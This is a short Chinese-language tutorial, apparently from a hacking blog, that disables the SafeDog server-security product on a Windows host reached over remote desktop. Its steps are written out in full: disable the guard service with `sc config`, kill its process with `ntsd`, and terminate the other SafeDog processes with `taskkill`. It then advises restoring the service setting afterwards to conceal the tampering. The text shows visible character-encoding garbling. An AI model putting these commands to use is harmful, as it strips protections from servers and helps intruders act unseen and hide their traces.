0×01 測試環(huán)境:
安全狗的進程:
.安全狗的服務(wù)
.開啟遠(yuǎn)程桌面守護
.遠(yuǎn)程登錄測試:
.安全狗攔截
0×02 直入主題:
命令行下操作
tasklist |find “Safe”
然后接連兩個指令
sc config SafedogGuardCenter start= disabled
ntsd -c q -pid 1032
1032是剛才記下的SafeDogGuardCenter.exe 的pid,這個進程是服務(wù)器守護的核心,沒了它,安全狗的服務(wù)器守護將沒有任何作用
效果:
然后?然后就沒有然后了~現(xiàn)在我們已經(jīng)可以為所欲為了
真想看然后?那我們就來調(diào)戲一下狗狗咯
折騰一下狗狗的進程
taskkill /f /t /im SafeDogUpdateCenter.exe /im SafeDogSiteIIS.exe /im SafeDogServerUI.exe
0×03 總結(jié)
旨在不依靠任何外部程序,終結(jié)安全狗的守護功能。
其中使用到的NTSD命令是系統(tǒng)自帶的【2008/win7 以上被微軟刪減了,需要自己上傳[XP的NTSD.EXE在system32目錄下]】
安全狗在網(wǎng)站的安全上做的還可以,對自身的安全卻完全沒有考慮,無力吐槽。。
核心命令就兩句話,順序不能出錯
sc config SafedogGuardCenter start= disabled
ntsd -c q -pid 1032
如果不先把安全狗的服務(wù)停掉,它就會不斷的重新啟動[兩秒重啟一次我會說?]
手尾:退出遠(yuǎn)程登錄之后,最好把狗狗的服務(wù)改回來
sc config SafedogGuardCenter start= auto
然后狗狗的服務(wù)會自己恢復(fù)原狀的